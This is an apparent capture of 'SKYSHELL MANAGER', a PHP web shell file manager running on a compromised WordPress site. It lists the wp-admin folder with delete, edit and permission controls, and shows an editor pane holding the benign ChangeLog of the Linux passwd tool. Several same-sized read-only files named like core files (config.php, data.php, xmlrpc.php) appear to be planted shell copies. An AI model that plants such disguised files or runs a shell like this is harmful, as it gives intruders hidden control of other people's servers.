📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
data.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: ChangeLog
2013-03-25 Miloslav Trmač <mitr@redhat.com> * libuser.c (pwdb_display_status): Fix a memory leak. * libuser.c: Define GLIB_VERSION_MIN_REQUIRED to shut down GLib warnings we can't do anything about. (pwdb_unlock_password): Use lu_ent_get_first_value_strdup(). (ent_value_strdup): Remove. Use equivalent lu_ent_get_first_value_strdup() in callers. (pwdb_update_gecos, pwdb_update_shell): Use lu_ent_set_string(). (pwdb_update_aging): Use lu_ent_set_long(). 2012-11-26 Miloslav Trmač <mitr@redhat.com> * Makefile.am (EXTRA_DIST): Don't ship autogenerated m4/ChangeLog. Don't explicitly ask for autotools-managed config.rpath and mkinstalldirs. * configure.ac: Specify gettext version to fix (autoreconf). 2010-01-28 Tomas Mraz <tmraz@redhat.com> * passwd.spec.in: Add COPYING and other things as %doc 2009-10-22 Tomas Mraz <tmraz@redhat.com> * po/*.po*: Updated translations from transifex. * passwd.1: Manual page improvements. * passwd.spec.in: Fix license tag. 2009-09-14 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.77 * po/*.po*: Updated translations from transifex. * passwd.1: Manual page improvements. 2009-02-11 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.76 * libuser.c (pwdb_display_status): Add support for SHA512, SHA256 hashes. * po/*.po*: Updated translations. * passwd.pamd: Add optional pam_gnome_keyring module. 2008-02-20 Tomas Mraz <tmraz@redhat.com> * Makefile.am: Build cleanup. * po/LINGUAS: sr@Latn -> sr@latin * COPYING: Add license text and full GPLv2 text. * chfn.1: Removed. * chfn.c: Removed. * chsh.1: Removed. * chsh.c: Removed. * version.c: Removed. * version.h: Removed. * po/POTFILES.in: Drop removed files. 2008-02-19 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.75 * passwd.spec.in: Fedora review fixes. Non-SELinux build fixes. * po/no.po: Removed. * po/LINGUAS: Removed obsolete no translation. 2006-12-12 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.74, add gettext support * libuser.c: Reformatted some messages for better translations. * passwd.c: Reformatted some messages for better translations, marked some more messages for translations, initialize locales and gettext. * passwd.spec.in: Call %find_lang. * pwdb.h: Define _ as gettext. 2006-12-06 gettextize <bug-gnu-gettext@gnu.org> * Makefile.am (EXTRA_DIST): Add config.rpath, mkinstalldirs, m4/ChangeLog. * configure.ac (AC_CONFIG_FILES): Add po/Makefile.in. 2006-12-06 Tomas Mraz <tmraz@redhat.com> * libuser.c (CHECK_ERROR): Improve the error message. (shutdown_libuser): Make it void function. (startup_libuser): Make it void function. Improve error reporting. (pwdb_unlock_password): Warn the admin about the empty password. (pwdb_display_status): Error should be printed on stderr, return meaningful value. * pwdb.c (CHECK_ERROR): Improve the error message. 2006-07-17 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.73. * passwd.c (parse_args): Fix broken logic from the last change. 2006-07-14 Tomas Mraz <tmraz@redhat.com> * configure.ac: Set use_selinux to no if not available, version 0.72 * libuser.c (ent_value_strdup, ent_value_int64): New. (pwdb_display_status): Improve status output, print expiration values. * passwd.c (parse_args, main): Use new audit calls, don't call selinux_check_passwd_access when selinux is disabled. 2006-05-25 Tomas Mraz <tmraz@redhat.com> * passwd.1: Change reference to the Linux-PAM administrators guide (#193084) 2005-10-07 Tomas Mraz <tmraz@redhat.com> * configure.ac: Version 0.71 * passwd.pamd: Replace pam_stack with include. 2005-09-29 Tomas Mraz <tmraz@redhat.com> * libuser.c (pwdb_update_shell): Replace LU_GECOS with LU_LOGINSHELL (#168029) 2005-06-17 Tomas Mraz <tmraz@redhat.com> * configure.ac (AM_INIT_AUTOMAKE, AC_INIT): Change to the new style of initialization. * passwd.c (stdin_conv): Respond with password only on PAM_PROMPT_ECHO_OFF * passwd.c: Replace LAuS with Audit. (laus_help_errmsg, laus_help_log, laus_help_open): Removed. * passwd.spec: Removed. * passwd.spec.in: New file. Template for passwd.spec. 2005-01-25 Dan Walsh <dwalsh@redhat.com> * Improve SELinux priv checking 2004-08-23 Jindrich Novy <jnovy@redhat.com> * passwd.1: updated man page 2004-08-23 Steve Grubb <linux_4ever@yahoo.com> * passwd.c, version.c: code cleanup patch 1999-08-23 Cristian Gafton <gafton@redhat.com> * pwdb.c (pwdb_lock_password): Fixed the passwd -u problem. Patch from Mihai Ibanescu <misa@necomm.ro> 1999-08-13 Cristian Gafton <gafton@redhat.com> * pwdstat.c: New file for examples 1999-04-14 Cristian Gafton <gafton@redhat.com> * pwdb.c (pwdb_lock_password): Put two !! for a locked password. (pwdb_unlock_password): get rid of any number of '!' chars in front of a crypted password
Save